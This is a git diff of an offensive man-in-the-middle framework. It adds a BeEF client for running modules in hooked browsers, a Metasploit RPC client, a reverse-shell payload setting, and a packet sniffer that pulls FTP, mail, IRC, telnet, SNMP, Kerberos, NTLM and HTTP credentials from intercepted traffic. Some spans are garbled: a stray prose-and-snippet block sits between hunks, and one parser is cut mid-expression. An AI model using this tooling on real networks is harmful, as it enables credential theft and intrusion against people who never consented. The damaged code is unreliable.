diff --git a/.gitmodules b/.gitmodules index fbdd874..65a6dc5 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,9 +1,3 @@ [submodule "libs/bdfactory"] path = libs/bdfactory url = https://github.com/secretsquirrel/the-backdoor-factory -[submodule "libs/responder"] - path = libs/responder - url = https://github.com/byt3bl33d3r/Responder-MITMf -[submodule "core/beefapi"] - path = core/beefapi - url = https://github.com/byt3bl33d3r/beefapi diff --git a/README.md b/README.md index 3334510..e07b1ce 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project. -**Before submitting issues please read the appropriate [section](#submitting-issues).** +**Before submitting issues please read the [FAQ](#faq) and the appropriate [section](#submitting-issues).** (Another) Dependency change! ============================ @@ -18,7 +18,7 @@ How to install on Kali ```apt-get install mitmf``` -**Currently Kali has a very old version of MITMf in it's repos, please read the [Installation](#installation) section to get the latest version** +**Currently Kali has a very old version of MITMf in its repos, so if you find bugs it's normal; don't open an issue! Read the [Installation](#installation) section to get the latest version** Installation ============ @@ -27,7 +27,7 @@ If MITMf is not in your distros repo or you just want the latest version: - run the ```setup.sh``` script - run the command ```pip install -r requirements.txt``` to install all python dependencies -On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pycap``` to fix it. +On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it. Availible plugins ================= @@ -86,3 +86,20 @@ If you find a *bug* please open an issue and include at least the following in t - OS your using Also remember: Github markdown is your friend! + +FAQ +=== +- **Is Windows supported?** +- No, I'm not masochistic and I actually want things to work. + +- **I can't install package X because of an error!** +- Try installing the module via ```pip``` or your distro's package manager. This *isn't* a problem with MITMf. + +- **How do I install package X?** +- Please read the [installation](#installation) guide. + +- **I get an ImportError when launching MITMf!** +- Please read the [installation](#installation) guide. + +- **Dude, no documentation/video tutorials?** +- Currently no; once the framework hits 1.0 I'll probably start writing/making some.
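The FAQ above sends ImportError reports back to the installation guide; for the specific pypcap case called out for Kali, a minimal check like the following (a sketch, assuming the same Python 2 interpreter MITMf is launched with) confirms whether the missing module is the problem:

```python
#!/usr/bin/env python2.7
# Checks for the "ImportError: no module named pcap" condition described above.
try:
    import pcap  # the module provided by the pypcap package (python-pypcap on Kali)
    print("pypcap found at %s" % pcap.__file__)
except ImportError:
    print("pypcap missing: apt-get install python-pypcap (or pip install pypcap)")
```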
diff --git a/config/mitmf.conf b/config/mitmf.conf index 58d82e5..614ac72 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -400,7 +400,7 @@ SUPPLIED_SHELLCODE = None ZERO_CERT = True PATCH_DLL = False - MSFPAYLOAD = windows/x64/shell_reverse_tcp + MSFPAYLOAD = windows/x64/shell/reverse_tcp [[[[MachoIntelx86]]]] SHELL = reverse_shell_tcp diff --git a/core/beefapi b/core/beefapi deleted file mode 160000 index 28d2fef..0000000 --- a/core/beefapi +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 28d2fef986e217425cb621701f267e40425330c4 diff --git a/core/beefapi.py b/core/beefapi.py new file mode 100644 index 0000000..e8d2ec3 --- /dev/null +++ b/core/beefapi.py @@ -0,0 +1,171 @@ +#!/usr/bin/env python +import requests +import json +import logging +from random import sample +from string import lowercase, digits + +logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message + +class BeefAPI: + + def __init__(self, opts=[]): + self.host = "127.0.0.1" or opts.get(host) + self.port = "3000" or opts.get(port) + self.token = None + self.url = "http://%s:%s/api/" % (self.host, self.port) + self.login_url = self.url + "admin/login" + self.hookurl = self.url + "hooks?token=" + self.mod_url = self.url + "modules?token=" + self.log_url = self.url + "logs?token=" + + def random_url(self): + return "".join(sample(digits + lowercase, 8)) + + def login(self, username, password): + try: + auth = json.dumps({"username": username, "password": password}) + r = requests.post(self.login_url, data=auth) + data = r.json() + + if (r.status_code == 200) and (data["success"]): + self.token = data["token"] #Auth token + return True + elif r.status_code != 200: + return False + + except Exception, e: + print "beefapi ERROR: %s" % e + + def sessions_online(self): + return self.get_sessions("online", "session") + + def sessions_offline(self): + return self.get_sessions("offline", "session") + + def session2host(self, session): + return self.conversion(session, "ip") + + def session2id(self, session): + return self.conversion(session, "id") + + def hook_info(self, hook): #Returns parsed information on a session + session = self.conversion(hook, "session") + url = self.hookurl + self.token + r = requests.get(url).json() + + try: + states = ["online", "offline"] + for state in states: + for v in r["hooked-browsers"][state].items(): + if v[1]["session"] == session: + return v[1] + except IndexError: + pass + + def hook_info_all(self, hook): + session = self.conversion(hook, "session") + url = self.url + "hooks/%s?token=%s" % (session, self.token) + return requests.get(url).json() + + def hook_logs(self, hook): + session = self.conversion(hook, "session") + url = self.url + "logs/%s?token=%s" % (session, self.token) + return requests.get(url).json() + + def hosts_online(self): + return self.get_sessions("online", "ip") + + def hosts_offline(self): + return self.get_sessions("offline", "ip") + + def host2session(self, host): + return self.conversion(host, "session") + + def host2id(self, host): + return self.conversion(host, "id") + + def ids_online(self): + return self.get_sessions("online", "id") + + def ids_offline(self): + return self.get_sessions("offline", "id") + + def id2session(self, id): + return self.conversion(id, "session") + + def id2host(self, id): + return self.conversion(id, "ip") + + def module_id(self, name): #Returns module id + url = self.mod_url + self.token + try: + r = requests.get(url).json() + for v in r.values(): + if v["name"] == name: + return 
v["id"] + except Exception, e: + print "beefapi ERROR: %s" % e + + def module_name(self, id): #Returns module name + url = self.mod_url + self.token + try: + r = requests.get(url).json() + for v in r.values(): + if v["id"] == id: + return v["name"] + except Exception, e: + print "beefapi ERROR: %s" % e + + def module_run(self, hook, mod_id, options={}): #Executes a module on a specified session + try: + session = self.conversion(hook, "session") + headers = {"Content-Type": "application/json", "charset": "UTF-8"} + payload = json.dumps(options) + url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token) + return requests.post(url, headers=headers, data=payload).json() + except Exception, e: + print "beefapi ERROR: %s" % e + + def module_results(self, hook, mod_id, cmd_id): + session = self.conversion(hook, "session") + url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token) + return requests.get(url).json() + + def modules_list(self): + return requests.get(self.mod_url + self.token).json() + + def module_info(self, id): + url = self.url + "modules/%s?token=%s" % (id, self.token) + return requests.get(url).json() + + def logs(self): + return requests.get(self.log_url + self.token).json() + + def conversion(self, value, return_value): #Helper function for all conversion functions + url = self.hookurl + self.token + try: + r = requests.get(url).json() + states = ["online", "offline"] + for state in states: + for v in r["hooked-browsers"][state].items(): + for r in v[1].values(): + if str(value) == str(r): + return v[1][return_value] + + except Exception, e: + print "beefapi ERROR: %s" % e + + except IndexError: + pass + + def get_sessions(self, state, value): #Helper function + try: + hooks = [] + r = requests.get(self.hookurl + self.token).json() + for v in r["hooked-browsers"][state].items(): + hooks.append(v[1][value]) + + return hooks + except Exception, e: + print "beefapi ERROR: %s" % e diff --git a/core/configwatcher.py b/core/configwatcher.py index 0a2e570..e6eaaaf 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -1,13 +1,12 @@ #! 
/usr/bin/env python2.7 import logging - -logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler - from configobj import ConfigObj +logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages + mitmf_logger = logging.getLogger('mitmf') class ConfigWatcher(FileSystemEventHandler): diff --git a/core/dnschef/dnschef.py b/core/dnschef/DNSchef.py similarity index 100% rename from core/dnschef/dnschef.py rename to core/dnschef/DNSchef.py diff --git a/core/msfrpc.py b/core/msfrpc.py index 59913ec..f722875 100644 --- a/core/msfrpc.py +++ b/core/msfrpc.py @@ -20,66 +20,69 @@ # USA # -import requests import msgpack +import logging +import requests + +logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message class Msfrpc: - class MsfError(Exception): - def __init__(self,msg): - self.msg = msg - def __str__(self): - return repr(self.msg) + class MsfError(Exception): + def __init__(self,msg): + self.msg = msg + def __str__(self): + return repr(self.msg) - class MsfAuthError(MsfError): - def __init__(self,msg): - self.msg = msg - - def __init__(self,opts=[]): - self.host = opts.get('host') or "127.0.0.1" - self.port = opts.get('port') or "55552" - self.uri = opts.get('uri') or "/api/" - self.ssl = opts.get('ssl') or False - self.token = None - self.headers = {"Content-type" : "binary/message-pack"} + class MsfAuthError(MsfError): + def __init__(self,msg): + self.msg = msg + + def __init__(self,opts=[]): + self.host = opts.get('host') or "127.0.0.1" + self.port = opts.get('port') or "55552" + self.uri = opts.get('uri') or "/api/" + self.ssl = opts.get('ssl') or False + self.token = None + self.headers = {"Content-type" : "binary/message-pack"} - def encode(self, data): - return msgpack.packb(data) + def encode(self, data): + return msgpack.packb(data) - def decode(self, data): - return msgpack.unpackb(data) + def decode(self, data): + return msgpack.unpackb(data) - def call(self, method, opts=[]): - if method != 'auth.login': - if self.token == None: - raise self.MsfAuthError("MsfRPC: Not Authenticated") + def call(self, method, opts=[]): + if method != 'auth.login': + if self.token == None: + raise self.MsfAuthError("MsfRPC: Not Authenticated") - if method != "auth.login": - opts.insert(0, self.token) + if method != "auth.login": + opts.insert(0, self.token) - if self.ssl == True: - url = "https://%s:%s%s" % (self.host, self.port, self.uri) - else: - url = "http://%s:%s%s" % (self.host, self.port, self.uri) - + if self.ssl == True: + url = "https://%s:%s%s" % (self.host, self.port, self.uri) + else: + url = "http://%s:%s%s" % (self.host, self.port, self.uri) + - opts.insert(0, method) - payload = self.encode(opts) + opts.insert(0, method) + payload = self.encode(opts) - r = requests.post(url, data=payload, headers=self.headers) + r = requests.post(url, data=payload, headers=self.headers) - opts[:] = [] #Clear opts list - - return self.decode(r.content) + opts[:] = [] #Clear opts list + + return self.decode(r.content) - def login(self, user, password): - auth = self.call("auth.login", [user, password]) - try: - if auth['result'] == 'success': - self.token = auth['token'] - return True - except: - raise self.MsfAuthError("MsfRPC: Authentication failed") + def login(self, user, password): + auth = self.call("auth.login", [user, password]) + try: + if auth['result'] == 'success': + self.token = 
auth['token'] + return True + except: + raise self.MsfAuthError("MsfRPC: Authentication failed") if __name__ == '__main__': diff --git a/core/netcreds/NetCreds.py b/core/netcreds/NetCreds.py new file mode 100644 index 0000000..0bfef7a --- /dev/null +++ b/core/netcreds/NetCreds.py @@ -0,0 +1,907 @@ +#!/usr/bin/env python2 + +import logging +import binascii +import struct +import base64 +import threading +import binascii + +from os import geteuid, devnull +from sys import exit +from urllib import unquote +from collections import OrderedDict +from BaseHTTPServer import BaseHTTPRequestHandler +from StringIO import StringIO +from urllib import unquote + +# shut up scapy +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) +from scapy.all import * +conf.verb=0 + +mitmf_logger = logging.getLogger('mitmf') + +DN = open(devnull, 'w') +pkt_frag_loads = OrderedDict() +challenge_acks = OrderedDict() +mail_auths = OrderedDict() +telnet_stream = OrderedDict() + +# Regexs +authenticate_re = '(www-|proxy-)?authenticate' +authorization_re = '(www-|proxy-)?authorization' +ftp_user_re = r'USER (.+)\r\n' +ftp_pw_re = r'PASS (.+)\r\n' +irc_user_re = r'NICK (.+?)((\r)?\n|\s)' +irc_pw_re = r'NS IDENTIFY (.+)' +irc_pw_re2 = 'nickserv :identify (.+)' +mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)' +mail_auth_re1 = '(\d+ )?login ' +NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+' +NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' +# Prone to false+ but prefer that to false- +http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))' + +class NetCreds: + + def sniffer(self, myip, interface): + #set the filter to our ip to prevent capturing traffic coming/going from our box + sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(myip), store=0) + #sniff(iface=interface, prn=pkt_parser, store=0) + + def start(self, myip, interface): + t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, myip,)) + t.setDaemon(True) + t.start() + +def pkt_parser(pkt): + ''' + Start parsing packets here + ''' + global pkt_frag_loads, mail_auths + + if pkt.haslayer(Raw): + load = pkt[Raw].load + + # Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control + if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6): + return + + # UDP + if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw): + + src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport) + dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport) + + # SNMP community strings + if pkt.haslayer(SNMP): + parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP]) + return + + # Kerberos over UDP + decoded = Decode_Ip_Packet(str(pkt)[14:]) + kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:]) + if kerb_hash: + printer(src_ip_port, dst_ip_port, kerb_hash) + + # TCP + elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP): + + ack = str(pkt[TCP].ack) + seq = str(pkt[TCP].seq) + src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport) + dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport) + frag_remover(ack, load) + pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load) + full_load = pkt_frag_loads[src_ip_port][ack] + + # Limit the packets we regex to increase efficiency + # 750 is a bit arbitrary but some SMTP auth success pkts + # are 500+ characters + if 0 < len(full_load) < 750: + + # FTP + ftp_creds = parse_ftp(full_load, dst_ip_port) + if 
len(ftp_creds) > 0: + for msg in ftp_creds: + printer(src_ip_port, dst_ip_port, msg) + return + + # Mail + mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq) + + # IRC + irc_creds = irc_logins(full_load, pkt) + if irc_creds != None: + printer(src_ip_port, dst_ip_port, irc_creds) + return + + # Telnet + telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) + + # HTTP and other protocols that run on TCP + a raw load + other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) + +def frag_remover(ack, load): + ''' + Keep the FILO OrderedDict of frag loads from getting too large + 3 points of limit: + Number of ip_ports < 50 + Number of acks per ip:port < 25 + Number of chars in load < 5000 + ''' + global pkt_frag_loads + + # Keep the number of IP:port mappings below 50 + # last=False pops the oldest item rather than the latest + while len(pkt_frag_loads) > 50: + pkt_frag_loads.popitem(last=False) + + # Loop through a deep copy dict but modify the original dict + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + if len(copy_pkt_frag_loads[ip_port]) > 0: + # Keep 25 ack:load's per ip:port + while len(copy_pkt_frag_loads[ip_port]) > 25: + pkt_frag_loads[ip_port].popitem(last=False) + + # Recopy the new dict to prevent KeyErrors for modifying dict in loop + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + # Keep the load less than 75,000 chars + for ack in copy_pkt_frag_loads[ip_port]: + # If load > 5000 chars, just keep the last 200 chars + if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: + pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] + +def frag_joiner(ack, src_ip_port, load): + ''' + Keep a store of previous fragments in an OrderedDict named pkt_frag_loads + ''' + for ip_port in pkt_frag_loads: + if src_ip_port == ip_port: + if ack in pkt_frag_loads[src_ip_port]: + # Make pkt_frag_loads[src_ip_port][ack] = full load + old_load = pkt_frag_loads[src_ip_port][ack] + concat_load = old_load + load + return OrderedDict([(ack, concat_load)]) + + return OrderedDict([(ack, load)]) + +def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq): + ''' + Catch telnet logins and passwords + ''' + global telnet_stream + + msg = None + + if src_ip_port in telnet_stream: + # Do a utf decode in case the client sends telnet options before their username + # No one would care to see that + try: + telnet_stream[src_ip_port] += load.decode('utf8') + except UnicodeDecodeError: + pass + + # \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed + if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]: + telnet_split = telnet_stream[src_ip_port].split(' ', 1) + cred_type = telnet_split[0] + value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '') + # Create msg, the return variable + msg = 'Telnet %s: %s' % (cred_type, value) + printer(src_ip_port, dst_ip_port, msg) + del telnet_stream[src_ip_port] + + # This part relies on the telnet packet ending in + # "login:", "password:", or "username:" and being <750 chars + # Haven't seen any false+ but this is pretty general + # might catch some eventually + # maybe use dissector.py telnet lib? 
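+    # Worked example (assumed traffic): a server prompt ending in "login:" seeds
+    # telnet_stream[dst_ip_port] = 'username ' below; the client's next packet, e.g.
+    # "alice\r\n", is appended above and printed as "Telnet username: alice".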
+ if len(telnet_stream) > 100: + telnet_stream.popitem(last=False) + mod_load = load.lower().strip() + if mod_load.endswith('username:') or mod_load.endswith('login:'): + telnet_stream[dst_ip_port] = 'username ' + elif mod_load.endswith('password:'): + telnet_stream[dst_ip_port] = 'password ' + +def ParseMSKerbv5TCP(Data): + ''' + Taken from Pcredz because I didn't want to spend the time doing this myself + I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel? + Maybe replace this eventually with the kerberos python lib + Parses Kerberosv5 hashes from packets + ''' + try: + MsgType = Data[21:22] + EncType = Data[43:44] + MessageType = Data[32:33] + except IndexError: + return + + if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": + if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": + HashLen = struct.unpack(' 1: + lines = full_load.count('\r\n') + if lines > 1: + full_load = full_load.split('\r\n')[-2] # -1 is '' + return full_load + +def parse_ftp(full_load, dst_ip_port): + ''' + Parse out FTP creds + ''' + print_strs = [] + + # Sometimes FTP packets double up on the authentication lines + # We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n" + full_load = double_line_checker(full_load, 'USER') + + # FTP and POP potentially use idential client > server auth pkts + ftp_user = re.match(ftp_user_re, full_load) + ftp_pass = re.match(ftp_pw_re, full_load) + + if ftp_user: + msg1 = 'FTP User: %s' % ftp_user.group(1).strip() + print_strs.append(msg1) + if dst_ip_port[-3:] != ':21': + msg2 = 'Nonstandard FTP port, confirm the service that is running on it' + print_strs.append(msg2) + + elif ftp_pass: + msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip() + print_strs.append(msg1) + if dst_ip_port[-3:] != ':21': + msg2 = 'Nonstandard FTP port, confirm the service that is running on it' + print_strs.append(msg2) + + return print_strs + +def mail_decode(src_ip_port, dst_ip_port, mail_creds): + ''' + Decode base64 mail creds + ''' + try: + decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8') + decoded = decoded.replace('\x00', ' ') + except TypeError: + decoded = None + except UnicodeDecodeError as e: + decoded = None + + if decoded != None: + msg = 'Decoded: %s' % decoded + printer(src_ip_port, dst_ip_port, msg) + +def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq): + ''' + Catch IMAP, POP, and SMTP logins + ''' + # Handle the first packet of mail authentication + # if the creds aren't in the first packet, save it in mail_auths + + # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...] + global mail_auths + found = False + + # Sometimes mail packets double up on the authentication lines + # We just want the lastest one. 
Ex: "1 auth plain\r\n2 auth plain\r\n" + full_load = double_line_checker(full_load, 'auth') + + # Client to server 2nd+ pkt + if src_ip_port in mail_auths: + if seq in mail_auths[src_ip_port][-1]: + stripped = full_load.strip('\r\n') + try: + decoded = base64.b64decode(stripped) + msg = 'Mail authentication: %s' % decoded + printer(src_ip_port, dst_ip_port, msg) + except TypeError: + pass + mail_auths[src_ip_port].append(ack) + + # Server responses to client + # seq always = last ack of tcp stream + elif dst_ip_port in mail_auths: + if seq in mail_auths[dst_ip_port][-1]: + # Look for any kind of auth failure or success + a_s = 'Authentication successful' + a_f = 'Authentication failed' + # SMTP auth was successful + if full_load.startswith('235') and 'auth' in full_load.lower(): + # Reversed the dst and src + printer(dst_ip_port, src_ip_port, a_s) + found = True + try: + del mail_auths[dst_ip_port] + except KeyError: + pass + # SMTP failed + elif full_load.startswith('535 '): + # Reversed the dst and src + printer(dst_ip_port, src_ip_port, a_f) + found = True + try: + del mail_auths[dst_ip_port] + except KeyError: + pass + # IMAP/POP/SMTP failed + elif ' fail' in full_load.lower(): + # Reversed the dst and src + printer(dst_ip_port, src_ip_port, a_f) + found = True + try: + del mail_auths[dst_ip_port] + except KeyError: + pass + # IMAP auth success + elif ' OK [' in full_load: + # Reversed the dst and src + printer(dst_ip_port, src_ip_port, a_s) + found = True + try: + del mail_auths[dst_ip_port] + except KeyError: + pass + + # Pkt was not an auth pass/fail so its just a normal server ack + # that it got the client's first auth pkt + else: + if len(mail_auths) > 100: + mail_auths.popitem(last=False) + mail_auths[dst_ip_port].append(ack) + + # Client to server but it's a new TCP seq + # This handles most POP/IMAP/SMTP logins but there's at least one edge case + else: + mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE) + if mail_auth_search != None: + auth_msg = full_load + # IMAP uses the number at the beginning + if mail_auth_search.group(1) != None: + auth_msg = auth_msg.split()[1:] + else: + auth_msg = auth_msg.split() + # Check if its a pkt like AUTH PLAIN dvcmQxIQ== + # rather than just an AUTH PLAIN + if len(auth_msg) > 2: + mail_creds = ' '.join(auth_msg[2:]) + msg = 'Mail authentication: %s' % mail_creds + printer(src_ip_port, dst_ip_port, msg) + + mail_decode(src_ip_port, dst_ip_port, mail_creds) + try: + del mail_auths[src_ip_port] + except KeyError: + pass + found = True + + # Mail auth regex was found and src_ip_port is not in mail_auths + # Pkt was just the initial auth cmd, next pkt from client will hold creds + if len(mail_auths) > 100: + mail_auths.popitem(last=False) + mail_auths[src_ip_port] = [ack] + + # At least 1 mail login style doesn't fit in the original regex: + # 1 login "username" "password" + # This also catches FTP authentication! + # 230 Login successful. 
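+        # Worked example (assumed traffic): '1 login "alice" "hunter2"' splits below into
+        # ['1', 'login', '"alice"', '"hunter2"'] and is logged as: Authentication: "alice" "hunter2"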
+ elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None: + + # FTP authentication failures trigger this + #if full_load.lower().startswith('530 login'): + # return + + auth_msg = full_load + auth_msg = auth_msg.split() + if 2 < len(auth_msg) < 5: + mail_creds = ' '.join(auth_msg[2:]) + msg = 'Authentication: %s' % mail_creds + printer(src_ip_port, dst_ip_port, msg) + mail_decode(src_ip_port, dst_ip_port, mail_creds) + found = True + + if found == True: + return True + +def irc_logins(full_load, pkt): + ''' + Find IRC logins + ''' + user_search = re.match(irc_user_re, full_load) + pass_search = re.match(irc_pw_re, full_load) + pass_search2 = re.search(irc_pw_re2, full_load.lower()) + if user_search: + msg = 'IRC nick: %s' % user_search.group(1) + return msg + if pass_search: + msg = 'IRC pass: %s' % pass_search.group(1) + return msg + if pass_search2: + msg = 'IRC pass: %s' % pass_search2.group(1) + return msg + +def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): + ''' + Pull out pertinent info from the parsed HTTP packet data + ''' + user_passwd = None + http_url_req = None + method = None + http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] + http_line, header_lines, body = parse_http_load(full_load, http_methods) + headers = headers_to_dict(header_lines) + if 'host' in headers: + host = headers['host'] + else: + host = '' + + #if http_line != None: + # method, path = parse_http_line(http_line, http_methods) + # http_url_req = get_http_url(method, host, path, headers) + #if http_url_req != None: + #printer(src_ip_port, None, http_url_req) + + # Print search terms + searched = get_http_searches(http_url_req, body, host) + if searched: + printer(src_ip_port, dst_ip_port, searched) + + #We dont need this cause its being taking care of by the proxy + + #Print user/pwds + #if body != '': + # user_passwd = get_login_pass(body) + # if user_passwd != None: + # try: + # http_user = user_passwd[0].decode('utf8') + # http_pass = user_passwd[1].decode('utf8') + # # Set a limit on how long they can be prevent false+ + # if len(http_user) > 75 or len(http_pass) > 75: + # return + # user_msg = 'HTTP username: %s' % http_user + # printer(src_ip_port, dst_ip_port, user_msg) + # pass_msg = 'HTTP password: %s' % http_pass + # printer(src_ip_port, dst_ip_port, pass_msg) + # except UnicodeDecodeError: + # pass + + # Print POST loads + # ocsp is a common SSL post load that's never interesting + #if method == 'POST' and 'ocsp.' 
not in host: + # try: + # msg = 'POST load: %s' % body.encode('utf8') + # printer(src_ip_port, None, msg) + # except UnicodeDecodeError: + # pass + + # Kerberos over TCP + decoded = Decode_Ip_Packet(str(pkt)[14:]) + kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:]) + if kerb_hash: + printer(src_ip_port, dst_ip_port, kerb_hash) + + # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL) + NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL) + NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL) + if NTLMSSP2: + parse_ntlm_chal(NTLMSSP2.group(), ack) + if NTLMSSP3: + ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq) + if ntlm_resp_found != None: + printer(src_ip_port, dst_ip_port, ntlm_resp_found) + + # Look for authentication headers + if len(headers) == 0: + authenticate_header = None + authorization_header = None + for header in headers: + authenticate_header = re.match(authenticate_re, header) + authorization_header = re.match(authorization_re, header) + if authenticate_header or authorization_header: + break + + if authorization_header or authenticate_header: + # NETNTLM + netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq) + if netntlm_found != None: + printer(src_ip_port, dst_ip_port, netntlm_found) + + # Basic Auth + parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header) + +def get_http_searches(http_url_req, body, host): + ''' + Find search terms from URLs. Prone to false positives but rather err on that side than false negatives + search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command + ''' + false_pos = ['i.stack.imgur.com'] + + searched = None + if http_url_req != None: + searched = re.search(http_search_re, http_url_req, re.IGNORECASE) + if searched == None: + searched = re.search(http_search_re, body, re.IGNORECASE) + + if searched != None and host not in false_pos: + searched = searched.group(3) + # Eliminate some false+ + try: + # if it doesn't decode to utf8 it's probably not user input + searched = searched.decode('utf8') + except UnicodeDecodeError: + return + # some add sites trigger this function with single digits + if searched in [str(num) for num in range(0,10)]: + return + # nobody's making >100 character searches + if len(searched) > 100: + return + msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' ')) + return msg + +def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header): + ''' + Parse basic authentication over HTTP + ''' + if authorization_header: + # authorization_header sometimes is triggered by failed ftp + try: + header_val = headers[authorization_header.group()] + except KeyError: + return + b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE) + if b64_auth_re != None: + basic_auth_b64 = b64_auth_re.group(1) + basic_auth_creds = base64.decodestring(basic_auth_b64) + msg = 'Basic Authentication: %s' % basic_auth_creds + printer(src_ip_port, dst_ip_port, msg) + +def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq): + ''' + Parse NTLM hashes out + ''' + # Type 2 challenge from server + if authenticate_header != None: + chal_header = authenticate_header.group() + parse_netntlm_chal(headers, chal_header, ack) + + # Type 3 response from client + elif authorization_header != None: + resp_header = authorization_header.group() + msg = parse_netntlm_resp_msg(headers, resp_header, seq) + if msg != None: + return msg + +def parse_snmp(src_ip_port, dst_ip_port, snmp_layer): + ''' + Parse out 
the SNMP version and community string + ''' + if type(snmp_layer.community.val) == str: + ver = snmp_layer.version.val + msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val) + printer(src_ip_port, dst_ip_port, msg) + return True + +def get_http_url(method, host, path, headers): + ''' + Get the HTTP method + URL from requests + ''' + if method != None and path != None: + + # Make sure the path doesn't repeat the host header + if host != '' and not re.match('(http(s)?://)?'+host, path): + http_url_req = method + ' ' + host + path + else: + http_url_req = method + ' ' + path + + http_url_req = url_filter(http_url_req) + + return http_url_req + +def headers_to_dict(header_lines): + ''' + Convert the list of header lines into a dictionary + ''' + headers = {} + # Incomprehensible list comprehension flattens list of headers + # that are each split at ': ' + # http://stackoverflow.com/a/406296 + headers_list = [x for line in header_lines for x in line.split(': ', 1)] + headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) + # Make the header key (like "Content-Length") lowercase + for header in headers_dict: + headers[header.lower()] = headers_dict[header] + + return headers + +def parse_http_line(http_line, http_methods): + ''' + Parse the header with the HTTP method in it + ''' + http_line_split = http_line.split() + method = '' + path = '' + + # Accounts for pcap files that might start with a fragment + # so the first line might be just text data + if len(http_line_split) > 1: + method = http_line_split[0] + path = http_line_split[1] + + # This check exists because responses are much different than requests e.g.: + # HTTP/1.1 407 Proxy Authentication Required ( Access is denied. ) + # Add a space to method because there's a space in http_methods items + # to avoid false+ + if method+' ' not in http_methods: + method = None + path = None + + return method, path + +def parse_http_load(full_load, http_methods): + ''' + Split the raw load into list of headers and body string + ''' + try: + headers, body = full_load.split("\r\n\r\n", 1) + except ValueError: + headers = full_load + body = '' + header_lines = headers.split("\r\n") + + # Pkts may just contain hex data and no headers in which case we'll + # still want to parse them for usernames and password + http_line = get_http_line(header_lines, http_methods) + if not http_line: + headers = '' + body = full_load + + header_lines = [line for line in header_lines if line != http_line] + + return http_line, header_lines, body + +def get_http_line(header_lines, http_methods): + ''' + Get the header with the http command + ''' + for header in header_lines: + for method in http_methods: + # / is the only char I can think of that's in every http_line + # Shortest valid: "GET /", add check for "/"? 
